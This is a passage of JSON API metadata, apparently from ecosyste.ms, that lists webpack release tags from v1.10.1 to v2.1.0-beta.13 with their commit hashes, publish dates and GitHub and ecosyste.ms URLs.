2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.